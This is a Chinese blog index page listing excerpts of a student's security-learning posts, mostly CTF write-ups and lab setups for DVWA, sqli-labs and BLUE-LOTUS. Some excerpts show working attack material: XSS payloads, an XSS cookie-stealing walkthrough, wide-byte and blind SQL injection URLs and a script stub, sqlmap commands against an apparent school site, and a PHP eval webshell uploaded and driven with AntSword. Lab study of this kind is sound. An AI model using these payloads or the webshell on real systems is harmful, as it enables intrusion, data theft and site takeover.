自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

weixin_50401030的博客

  • 博客(22)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 windows环境下docker搭建,docker安装sql-labs.

docker的安装链接:https://pan.baidu.com/s/1bp-10uwfcRz7TA1Wwlyjew提取码:we94首先安装下面的docker安装完成后不要立即重启电脑,运行上面的那个插件。运行完后重启即可(要求电脑是专业版及以上版本,版本号20H)至此docker安装完成...

2021-04-06 08:26:50 426 1

原创 虚拟机安装windows10

首先进入虚拟机点击左上角文件-新建虚拟机选择自定义(高级)下一步继续下一步选择稍后安装操作系统选择Windows 10 x64对虚拟机进行命名和存放位置跟着系统下一步根据电脑配置选择处理器和内核的数量根据电脑配置选择给多大内存继续下一步根据推荐选创建新虚拟磁盘再点自定义硬件使用ios镜像文件找到文件关闭完成即可接下来进入虚拟机,先开启虚拟机点击下一步选择专业版再下一步接受再下一步再点自定义安装再下一步现在就在开始安装了成

2020-12-08 19:39:25 3121

原创 BugkuCTF-Easy_vb

下载文件在ida中打开按Shift加f12查看因为名字叫Easy_vb所以查看第二个向下滑就能找到flag(记得前缀改为flag)

2020-12-07 07:53:52 214

原创 BugkuCTF-入门逆向

将压缩包放入虚拟机中用ida打开找到main打开发现这些转义即可得到flag

2020-11-23 21:33:53 188

原创 BugkuCTF-你必须让他停下来

进入题目进入网址发现网页一直再刷新,抓个包试试go个几次就找到了flag(根据图片的不同)

2020-11-15 18:09:43 456

原创 BugkuCTF-telnet

进入题目下载文件点开这个文件进入文件,因为题目叫telnet所以搜索telnet因为是要找flag的所以查找一个分组查找flag找到之后追踪即可找到flag

2020-11-08 21:52:03 233

原创 BUUCTF-old-fashion 1

下载压缩包打开题目发现将这段代码放入https://quipqiup.com/Solve出来后就能看到flag

2020-11-02 19:52:17 1129

原创 本地获取cookies(靶机)

进入dvwa将impossible改为low进入XSS(Stored)打开BLUE-LOTUS进入公共模板default.js进入我的js模板选择将网址改为BLUE-LOTUS的网址生成payload将payload输入到表格里发现输入不完全按f12审查源码发现有限制改掉即可点sign guestbook发现BLUE-LOTUS接受面板出现了值展开即可看到cookies重新打开个浏览器开启dvwa将cookies改..

2020-10-22 00:05:21 391

原创 安装BLUE-LOTUS

下载安装包链接:https://pan.baidu.com/s/1gi0okJityvv3WqnMPltLXA提取码:cvpo打开phpstudy开起阿帕奇和数据库点网站创建新的网站解压压缩包到www里然后浏览路径到压缩的文件夹里面打开网页安装即可...

2020-10-21 23:25:45 833

原创 DVWA环境安装

先下载dvwa压缩包链接:https://pan.baidu.com/s/15A2g10_qOK0thdmEUTNqsg提取码:qy57打开phpstudy开起阿帕奇和数据库点网站创建新的网站将文件加解压到WWW目录中然后根目录浏览dvwa-master文件夹配置DVWA的数据库,打开config文件夹,找到config.inc.php.dist,修改文件名为config.inc.php,打开它,修改db_password为root,保存。打开网站输入账..

2020-10-21 23:12:11 237

原创 XSS挑战(1-6)

第一关查看源代码可以看到这个<input name=keyword value="test">只要加上<script>alert('1')</script>第二关<input name=keyword value="test">用同样的方法发现行不通所以想到了用闭合的方法1"> <script>alert(1)</script>wait第三关<input name..

2020-10-15 23:46:59 82

原创 安装docker并部署镜像

安装dockercurl -sSL https://get.daocloud.io/docker | sh使用命令一切安装将所需要的文件上传linuxunzip 文件名配置镜像加速器sudo mkdir -p /etc/dockersudo tee /etc/docker/daemon.json <<-'EOF'{ "registry-mirrors": ["https://xmunhkue.mirror.aliyuncs.com"]}EOF..

2020-10-14 22:34:50 217

原创 无法使用虚拟机

点开控制面板点卸载程序,点启用或关闭windows功能把虚拟机平台前面的那个勾点掉点确定即可使用

2020-10-13 17:49:10 3682

原创 sql(宽度注入)

进入关卡查数据库?id=1.1%df%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+查表?id=1.1%df%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=da..

2020-10-08 23:20:20 102

原创 RDCTF(web:mangzhu)

1 进入网站输入1 得到的是输入2得到的是从这里可以找到一个不同的地方,开始写python代码import requests flag=""a = "Hello, glzjin wants a girlfriend." #成功后的显示url = "http://localhost/index.php" #题目网址for i in range(1,50): for j in range(1,128): #两个循环 payload = "if(a..

2020-09-25 00:06:12 197

原创 sql注入盲注

1.布尔型盲注(以SQLi-LABS Page-1(Basic Challenges) less8 为例子)1.首先判断数据库有多少位在这里插入图片描述大于7是成立的大于8是报错的所以数据库是8位?id=0%27%20or%20length(database())>8%20--+然后再查数据库名字在这里插入图片描述经过不断的尝试发现115是没有报错的所以第一个字母就是115对应的ascii码就是s一个字母一个字母的试下去发现得到的是security这个数据..

2020-09-23 11:57:34 154

原创 RDCTF-faka

进入题目找到注入点找到注入的地方,发现购买那就是一个注入点利用burp suite进行抓包发现了一个能注入的点,利用post注入即可,先将代码压缩成一个文件然后再用sqlmap跑接着利用sqlmap跑数据库sqlmap -r F:\a.txt -D --tables faka因为题目名字是faka所以跑faka的表sqlmap -r F:\a.txt -D faka --tables接着跑表-r F:\a.txt -D faka -T ayangw_config..

2020-09-19 00:28:54 444

原创 rdctf-shizhan1

接到上次的sqlmap接着攻击这个靶机上次的前面部分进入后台上传木马文件<?php @eval($_POST['shell']);?>将这个放入webshell.php文本中找到文件上传地方将webshell.php上传到文件上传文件上传成功点开这个文件得到网址之后将网址复制到蚁剑中完成后拿到网址权限拿到flag找到这个flag发现提交后是错误的所以flag另在其他的位置找了..

2020-09-14 18:30:41 97

原创 BUUCTF 文件中的秘密 1 + qr 1

1| 文件中的秘密 1下载压缩包得到图片打开图片属性flag就在里面了!flag{870c5a72806115cb5439345d8b014396}2| qr 1下载图片得到一个二维码拿微信扫二维码就能得到flag了!!!注意将Flag的F改成小写flag{878865ce73370a4ce607d21ca01b5e59}...

2020-09-11 21:47:41 1797

原创 sqlmap实战(学校靶机)

进入靶机打开sqlmap先找注入点,然后再将网站丢到sqlmap里面测试能不能注入sqlmap.py -u "http://.../narticle.php?nid=3050"这里显然是可以注入的,然后再找数据库sqlmap.py -u "http://.../narticle.php?nid=3050" --dbs找到数据库看到因为是软件学院所以显然是从rjxy下手找表sqlmap.py -u "http://.../narticle.ph..

2020-09-10 19:57:51 278

原创 下载并使用sqlmap

首先要安装python然后配置好环境(这里我安装好了丢个截图偷下懒)1| 点本机-高级属性-系统属性-环境变量再去网页下载sqlmap下载地址1| 下载好后解压2| 在桌面建立一个快捷方式右键快捷方式属性将原先那个解压的文件夹地址放到起始位置确定即可使用使用sqlmap登入个能注入的网站(这里用了SQLi-LABS Page-1(Basic Challenges))sqlmap -u "http://localhost:

2020-09-09 21:33:08 985

原创 菜鸟上分之路

一、搭建blog1.什么是blog?blog是用来记录日常学习到的新知识方便之后求职,可以让更快的知道你会什么0x01 blog 写法伤感图片python -vecho (1);标题1 | # 一级标题2 | ## 二级标题3 | ### 三级标题字体1| * 字体图片1|![]()链接1|[]() 代码1|``代码块1|``` ```...

2020-09-07 18:25:59 75

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除